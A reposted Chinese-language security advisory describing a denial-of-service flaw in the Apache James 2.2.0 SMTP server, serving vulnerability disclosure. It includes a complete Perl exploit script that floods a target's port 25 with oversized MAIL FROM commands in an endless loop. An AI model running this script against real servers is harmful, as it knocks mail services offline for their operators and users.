Apache James SMTP远程拒绝服务漏洞

2008-04-09 04:29:19来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Apache James SMTP远程拒绝服务漏洞

发布日期:2006-05-29
更新日期:2006-05-29

受影响系统:
Apache Group James 2.2.0
描述:
BUGTRAQ ID: 18138

Apache James是纯Java的SMTP和POP3邮件服务器及NNTP新闻服务器。

James SMTP服务程序允许攻击者在SMTP命令参数(如MAIL)中向SMTP服务器提供超长数据,导致服务器的处理器负载不断增加直到100%,导致拒绝服务。

<*来源:Ahmad Muammar W.K (y3dips@echo.or.id)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114892208612276&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

-------------------------- james.pl-----------------------------------------

#!/usr/bin/perl -w

use IO::Socket;

print "* DOS buat JAMES ver.2.2.0 by y3dips *\n";

if(@ARGV == 1)

{

my $host = $ARGV[0];
my $i = 1;

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>"25", Reuse=>1)
or die " Cannot Connect to Server !";

while ( $i ) {
print $socket "MAIL FROM:" . "fvclz" x 1000000 . "\r\n" and
print " -- sucking CPU resources at $host .....\n";
sleep(1);
}
close $socket;

}
else
{ print " Usage: $0 [target] \r\n\n"; }

---------------------------------------------------------------------------

建议:
厂商补丁:

Apache Group
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://httpd.apache.org/

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:tinyBB多个远程安全漏洞

下一篇:Microsoft Windows Server驱动内存信息泄露漏洞(MS06-035)